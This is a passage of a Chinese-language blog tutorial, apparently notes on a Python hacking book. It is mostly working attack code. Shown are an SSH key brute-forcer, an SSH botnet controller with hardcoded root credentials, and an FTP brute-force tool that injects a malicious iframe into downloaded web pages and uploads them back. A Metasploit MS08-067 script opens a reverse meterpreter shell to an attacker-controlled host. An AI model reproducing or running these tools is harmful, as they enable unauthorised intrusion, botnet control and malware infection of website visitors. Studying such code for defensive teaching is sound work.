        <span class="n">conn_str</span> <span class="o">=</span> <span class="s">"ssh {}@{} -i {}{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">key_file</span><span class="p">,</span> <span class="n">opt</span><span class="p">)</span>
        <span class="n">child</span> <span class="o">=</span> <span class="n">pexpect</span><span class="p">.</span><span class="n">spawn</span><span class="p">(</span><span class="n">conn_str</span><span class="p">)</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">([</span><span class="n">pexpect</span><span class="p">.</span><span class="n">TIMEOUT</span><span class="p">,</span> <span class="n">perm_denied</span><span class="p">,</span> <span class="n">ssh_new_key</span><span class="p">,</span> <span class="n">conn_closed</span><span class="p">,</span> <span class="s">"$"</span><span class="p">,</span> <span class="s">"#"</span><span class="p">,</span> <span class="p">])</span>
        <span class="k">if</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Adding Host to !/.ssh/known_hosts"</span><span class="p">)</span>
            <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"yes"</span><span class="p">)</span>
            <span class="n">connect</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">key_file</span><span class="p">,</span> <span class="bp">False</span><span class="p">)</span>
        <span class="k">elif</span> <span class="n">ret</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Connection Closed By Remote Host"</span><span class="p">)</span>
            <span class="n">fails</span> <span class="o">+=</span> <span class="mi">1</span>
        <span class="k">elif</span> <span class="n">ret</span> <span class="o">&gt;</span> <span class="mi">3</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Success. {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">key_file</span><span class="p">))</span>
            <span class="n">stop</span> <span class="o">=</span> <span class="bp">True</span>
    <span class="k">finally</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">release</span><span class="p">:</span>
            <span class="n">connection_lock</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -H &lt;target_host&gt; -u &lt;user&gt; -d &lt;directory&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_host"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-d"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"pass_dir"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify directory with keys"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"user"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify the user"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">target_host</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_host</span>
    <span class="n">pass_dir</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">pass_dir</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">user</span>

    <span class="k">if</span> <span class="n">target_host</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">pass_dir</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">user</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">file_name</span> <span class="ow">in</span> <span class="n">os</span><span class="p">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">pass_dir</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">stop</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Exiting: Key Found."</span><span class="p">)</span>
            <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">fails</span> <span class="o">&gt;</span> <span class="mi">5</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[!] Exiting: Too Many Connections Closed By Remote Host."</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[!] Adjust number of simultaneous threads."</span><span class="p">)</span>
            <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
        <span class="n">connection_lock</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>

        <span class="n">full_path</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">pass_dir</span><span class="p">,</span> <span class="n">file_name</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Testing keyfile {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">full_path</span><span class="p">))</span>
        <span class="n">t</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">connect</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">full_path</span><span class="p">,</span> <span class="bp">True</span><span class="p">))</span>
        <span class="n">child</span> <span class="o">=</span> <span class="n">t</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>

<h3 id="构建-ssh-僵尸网络">构建 SSH 僵尸网络</h3>

<p>每个单独的僵尸或者 client 都需要有能连上某台肉机，并把命令发送给肉机的能力</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">pexpect.pxssh</span> <span class="k">as</span> <span class="n">pxssh</span>

<span class="n">bot_net</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>

<span class="k">class</span> <span class="nc">Client</span><span class="p">:</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">host</span> <span class="o">=</span> <span class="n">host</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">user</span> <span class="o">=</span> <span class="n">user</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">password</span> <span class="o">=</span> <span class="n">password</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">session</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">connect</span><span class="p">()</span>

    <span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">s</span> <span class="o">=</span> <span class="n">pxssh</span><span class="p">.</span><span class="n">pxssh</span><span class="p">()</span>
            <span class="n">s</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">host</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">user</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">password</span><span class="p">)</span>
            <span class="k">return</span> <span class="n">s</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="n">e</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[-] Error Connecting"</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">send_command</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">prompt</span><span class="p">()</span>
        <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="n">before</span>

<span class="k">def</span> <span class="nf">bot_net_command</span><span class="p">(</span><span class="n">command</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">client</span> <span class="ow">in</span> <span class="n">bot_net</span><span class="p">:</span>
        <span class="n">output</span> <span class="o">=</span> <span class="n">client</span><span class="p">.</span><span class="n">send_command</span><span class="p">(</span><span class="n">command</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] Output from {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">client</span><span class="p">.</span><span class="n">host</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">output</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">add_client</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span>
    <span class="n">client</span> <span class="o">=</span> <span class="n">Client</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">user</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
    <span class="n">bot_net</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">client</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">add_client</span><span class="p">(</span><span class="s">"10.10.10.110"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">add_client</span><span class="p">(</span><span class="s">"10.10.10.120"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">add_client</span><span class="p">(</span><span class="s">"10.10.10.130"</span><span class="p">,</span> <span class="s">"root"</span><span class="p">,</span> <span class="s">"toor"</span><span class="p">)</span>
    <span class="n">bot_net_command</span><span class="p">(</span><span class="s">"uname -v"</span><span class="p">)</span>
    <span class="n">bot_net_command</span><span class="p">(</span><span class="s">"cat /etc/issue"</span><span class="p">)</span>
</code></pre></div></div>
<h2 id="利用-ftp-与-web-批量抓-肉机">利用 FTP 与 Web 批量抓 “肉机”</h2>

<h3 id="用-python-构建匿名-ftp-扫描器">用 Python 构建匿名 FTP 扫描器</h3>

<p>可以利用 Python 中的 ftplib 库编写一个小脚本，确定一个服务器是否允许匿名登录</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">ftplib</span>
<span class="k">def</span> <span class="nf">anon_login</span><span class="p">(</span><span class="n">hostname</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">hostname</span><span class="p">)</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="s">"anonymous"</span><span class="p">,</span> <span class="s">"me@your.com"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} FTP Anonymous Logon Succeeded."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">host</span><span class="p">))</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">quit</span><span class="p">()</span>
        <span class="k">return</span> <span class="bp">True</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] {} FTP Anonymous Logon Failed."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">host</span><span class="p">))</span>
        <span class="k">return</span> <span class="bp">False</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">host</span> <span class="o">=</span> <span class="s">"192.168.158.161"</span>
    <span class="n">anon_login</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="使用-ftplib-暴力破解-ftp-用户口令">使用 Ftplib 暴力破解 FTP 用户口令</h3>

<p><code class="language-plaintext highlighter-rouge">FileZilla</code> 之类的 FTP 客户端程序往往将密码以明文形式存储在配置文件中</p>

<p>只要将上面的 <code class="language-plaintext highlighter-rouge">ftp.login()</code> 替换上对应的用户名和密码就可以验证了</p>

<h3 id="在-ftp-服务器上搜索网页">在 FTP 服务器上搜索网页</h3>

<p>使用 <code class="language-plaintext highlighter-rouge">nlst</code> 函数，这会列出目录中所有文件的命令</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">dir_list</span> <span class="o">=</span> <span class="n">ftp</span><span class="p">.</span><span class="n">nlst</span><span class="p">()</span>
</code></pre></div></div>

<h3 id="在网页中加入恶意注入代码">在网页中加入恶意注入代码</h3>

<p>直接使用 <code class="language-plaintext highlighter-rouge">metasploit</code> 框架生成：</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfcli exploit/windows/browser/ms10_002_aurora
</code></pre></div></div>

<p>上传的命令：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ftp</span><span class="p">.</span><span class="n">storlines</span><span class="p">(</span><span class="s">"STOR {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="nb">open</span><span class="p">(</span><span class="s">"{}.tmp"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">)))</span>
</code></pre></div></div>

<h3 id="完整的代码-demo">完整的代码 DEMO</h3>

<p>虽然很多余，但还是把整个流程打一遍吧</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">ftplib</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">time</span>

<span class="k">def</span> <span class="nf">anon_login</span><span class="p">(</span><span class="n">hostname</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">hostname</span><span class="p">)</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="s">"anonymous"</span><span class="p">,</span> <span class="s">"me@your.com"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} FTP Anonymous Logon Succeeded."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span>
        <span class="n">ftp</span><span class="p">.</span><span class="n">quit</span><span class="p">()</span>
        <span class="k">return</span> <span class="bp">True</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] {} FTP Anonymous Logon Failed."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">))</span>
        <span class="k">return</span> <span class="bp">False</span>

<span class="k">def</span> <span class="nf">brute_login</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="n">password_file</span><span class="p">):</span>
    <span class="n">pf</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">password_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">pf</span><span class="p">.</span><span class="n">readlines</span><span class="p">():</span>
        <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">user_name</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
        <span class="n">password</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">1</span><span class="p">].</span><span class="n">strip</span><span class="p">(</span><span class="s">"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Trying: {}/{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user_name</span><span class="p">,</span> <span class="n">password</span><span class="p">))</span>

        <span class="k">try</span><span class="p">:</span>
            <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">hostname</span><span class="p">)</span>
            <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">user_name</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} FTP Logon Succeeded: {}/{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="n">user_name</span><span class="p">,</span> <span class="n">password</span><span class="p">))</span>
            <span class="n">ftp</span><span class="p">.</span><span class="n">quit</span><span class="p">()</span>
            <span class="k">return</span> <span class="n">user_name</span><span class="p">,</span> <span class="n">password</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="k">pass</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[-] Could not brute force FTP credentials."</span><span class="p">)</span>
    <span class="k">return</span> <span class="bp">None</span><span class="p">,</span> <span class="bp">None</span>

<span class="k">def</span> <span class="nf">return_default</span><span class="p">(</span><span class="n">ftp</span><span class="p">):</span>
    <span class="n">dir_list</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">dir_list</span> <span class="o">=</span> <span class="n">ftp</span><span class="p">.</span><span class="n">nlst</span><span class="p">()</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Could not list directory contents."</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Skipping To Next Target."</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">dir_list</span>

    <span class="n">ret_list</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">file_name</span> <span class="ow">in</span> <span class="n">dir_list</span><span class="p">:</span>
        <span class="n">fn</span> <span class="o">=</span> <span class="n">file_name</span><span class="p">.</span><span class="n">lower</span><span class="p">()</span>
        <span class="k">if</span> <span class="s">".php"</span> <span class="ow">in</span> <span class="n">fn</span> <span class="ow">or</span> <span class="s">".htm"</span> <span class="ow">in</span> <span class="n">fn</span> <span class="ow">or</span> <span class="s">".asp"</span> <span class="ow">in</span> <span class="n">fn</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found default page: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">file_name</span><span class="p">))</span>
        <span class="n">ret_list</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">file_name</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">ret_list</span>

<span class="k">def</span> <span class="nf">inject_page</span><span class="p">(</span><span class="n">ftp</span><span class="p">,</span> <span class="n">page</span><span class="p">,</span> <span class="n">redirect</span><span class="p">):</span>
    <span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"{}.tmp"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="s">"w"</span><span class="p">)</span>
    <span class="n">ftp</span><span class="p">.</span><span class="n">retrlines</span><span class="p">(</span><span class="s">"RETR {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Downloaded Page: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">))</span>
    <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">redirect</span><span class="p">)</span>
    <span class="n">f</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>

    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Injected Malicious IFrame on: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">))</span>
    <span class="n">ftp</span><span class="p">.</span><span class="n">storlines</span><span class="p">(</span><span class="s">"STOR {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">),</span> <span class="nb">open</span><span class="p">(</span><span class="s">"{}.tmp"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">)))</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Uploaded Injected Page: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">page</span><span class="p">))</span>

<span class="k">def</span> <span class="nf">attack</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">redirect</span><span class="p">):</span>
    <span class="n">ftp</span> <span class="o">=</span> <span class="n">ftplib</span><span class="p">.</span><span class="n">FTP</span><span class="p">(</span><span class="n">target_host</span><span class="p">)</span>
    <span class="n">ftp</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span>
    <span class="n">def_pages</span> <span class="o">=</span> <span class="n">return_default</span><span class="p">(</span><span class="n">ftp</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">def_page</span> <span class="ow">in</span> <span class="n">def_pages</span><span class="p">:</span>
        <span class="n">inject_page</span><span class="p">(</span><span class="n">ftp</span><span class="p">,</span> <span class="n">def_page</span><span class="p">,</span> <span class="n">redirect</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage%prog -H &lt;target host[s]&gt; -r &lt;redirect page&gt;[-f &lt;user_pass file&gt;]"</span><span class="p">)</span>

    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_hosts"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-f"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"password_file"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify user/password file"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-r"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"redirect"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify a redirection page"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">target_hosts</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">options</span><span class="p">.</span><span class="n">target_hosts</span><span class="p">).</span><span class="n">split</span><span class="p">(</span><span class="s">", "</span><span class="p">)</span>
    <span class="n">password_file</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">password_file</span>
    <span class="n">redirect</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">redirect</span>

    <span class="k">if</span> <span class="n">target_hosts</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">redirect</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">target_host</span> <span class="ow">in</span> <span class="n">target_hosts</span><span class="p">:</span>
        <span class="n">username</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="bp">None</span><span class="p">,</span> <span class="bp">None</span>
        <span class="k">if</span> <span class="n">anon_login</span><span class="p">(</span><span class="n">target_host</span><span class="p">):</span>
            <span class="n">username</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="s">"test"</span><span class="p">,</span> <span class="s">"test"</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Using Anonymous Creds to attack"</span><span class="p">)</span>
            <span class="n">attack</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">redirect</span><span class="p">)</span>
        <span class="k">elif</span> <span class="n">password_file</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
            <span class="n">username</span><span class="p">,</span> <span class="n">password</span> <span class="o">=</span> <span class="n">brute_login</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">password_file</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">password</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[+] Using Creds: {}/{} to attack"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">))</span>
                <span class="n">attack</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">redirect</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>
<h2 id="conficker为什么努力做就够了">Conficker，为什么努力做就够了</h2>

<p>蠕虫病毒，Conficker（或称为 W32DownandUp），在其基本的感染方法中，Conficker 蠕虫使用了两种不同的攻击方法。首先利用了 Windows 服务器中一个服务的 0Day 漏洞。利用这个栈溢出漏洞，蠕虫能在被感染的主机上执行 ShellCode 并下载蠕虫。当这种攻击失败时，Conficker 蠕虫又尝试暴力破解默认的管理员网络共享（<code class="language-plaintext highlighter-rouge">ADMIN$</code>）的口令以获取肉机访问权。</p>

<h3 id="使用-metasploit-攻击-windows-smb-服务">使用 Metasploit 攻击 Windows SMB 服务</h3>

<p>虽然攻击者可以通过交互驱动的方式使用 Metasploit，但 Metasploit 也能读取批处理脚本（rc）完成攻击。在攻击时，Metasploit 会顺序执行批处理文件中的命令。</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use exploit/windows/smb/ms08_067_netapi
<span class="nb">set </span>RHOST 192.168.1.37
<span class="nb">set </span>PAYLOAD windows/meterpreter/reverse_tcp
<span class="nb">set </span>LHOST 192.168.77.77
<span class="nb">set </span>LPORT 7777
exploit <span class="nt">-j</span> <span class="nt">-z</span>

msfconsole <span class="nt">-r</span> conficker.rc
<span class="o">&gt;</span> sessions <span class="nt">-i</span> 1
<span class="o">&gt;</span> execute <span class="nt">-i</span> <span class="nt">-f</span> cmd.exe
</code></pre></div></div>

<h3 id="编写-python-脚本与-metasploit-交互">编写 Python 脚本与 Metasploit 交互</h3>

<p>首先需要扫描网段内所有开放 445 端口的主机，TCP 445 端口主要是作为 SMB 协议的默认端口用的</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">nmap</span>
<span class="k">def</span> <span class="nf">find_target</span><span class="p">(</span><span class="n">sub_net</span><span class="p">):</span>
